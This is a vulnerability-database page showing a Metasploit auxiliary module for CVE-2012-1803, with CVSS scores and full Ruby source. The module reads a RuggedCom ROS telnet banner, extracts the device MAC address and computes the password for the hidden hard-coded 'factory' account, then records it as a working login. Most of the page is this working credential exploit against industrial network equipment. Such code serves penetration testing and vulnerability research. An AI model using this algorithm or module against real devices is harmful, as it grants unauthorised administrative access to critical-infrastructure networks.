Lucene search

Borja Merino <[email protected]>, jcMSF:AUXILIARY-SCANNER-TELNET-TELNET_RUGGEDCOM-

HistoryMay 13, 2012 - 9:09 a.m.

RuggedCom Telnet Password Generator

2012-05-1309:09:17

Borja Merino <[email protected]>, jc

www.rapid7.com

CVSS2

8.5

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:S/C:C/I:C/A:C

JSON

This module will calculate the password for the hard-coded hidden username “factory” in the RuggedCom Rugged Operating System (ROS). The password is dynamically generated based on the devices MAC address.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Telnet
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'RuggedCom Telnet Password Generator',
      'Description' => %q{
        This module will calculate the password for the hard-coded hidden username
        "factory" in the RuggedCom Rugged Operating System (ROS). The password is
        dynamically generated based on the devices MAC address.
      },
      'References'     =>
        [
          [ 'CVE', '2012-1803' ],
          [ 'EDB', '18779' ],
          [ 'US-CERT-VU', '889195' ]
        ],
      'Author'      => [
        'Borja Merino <bmerinofe[at]gmail.com>',
        'jc' # ExploitDB PoC
        ],
      'License'     => MSF_LICENSE
    ))

    register_options(
      [
        Opt::RPORT(23),
        OptString.new('USERNAME', [ true, 'The username to authenticate as', 'factory']),
        OptInt.new('TIMEOUT', [true, 'Timeout for the Telnet probe', 30])
      ])
  end


  def mac_to_password(mac)
    print_status("MAC Address: #{mac}")
    mac_clean = mac.gsub("-","")
    mac_reverse = mac_clean.each_char.each_slice(2).to_a.reverse.join
    mac_reverse << "0000"
    pass = mac_reverse.hex % 999999929
    print_status("Password: #{pass}")
    return pass.to_s
  end


  def get_info(banner)
    product = banner.match(/Product:\s*\S*/)[0]
    so_version = banner.match(/Rugged Operating System\s\S*/)[0]
    return so_version << "  " << product
  end

  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: 'telnet',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      last_attempted_at: DateTime.now,
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def run_host(ip)
    to = (datastore['TIMEOUT'].zero?) ? 30 : datastore['TIMEOUT']
    begin
      ::Timeout.timeout(to) do
        res = connect
        banner_santized = Rex::Text.to_hex_ascii(banner.to_s)
        if banner_santized =~ /Rugged Operating System/
          print_status("#{ip}:#{rport} Calculating Telnet password ...")
          mac  = banner_santized.match(/((?:[0-9a-f]{2}[-]){5}[0-9a-f]{2})/i)[0]
          password = mac_to_password(mac)
          info = get_info(banner_santized)
          report_cred(ip: rhost, port: rport, user:'factory', password: password, proof: banner_santized)
          break
        else
          print_status("It doesn't seem to be a RuggedCom service.")
          break
        end
      end

    rescue ::Rex::ConnectionError
    rescue Timeout::Error
      print_error("#{target_host}:#{rport}, Server timed out after #{to} seconds. Skipping.")
    end
  end
end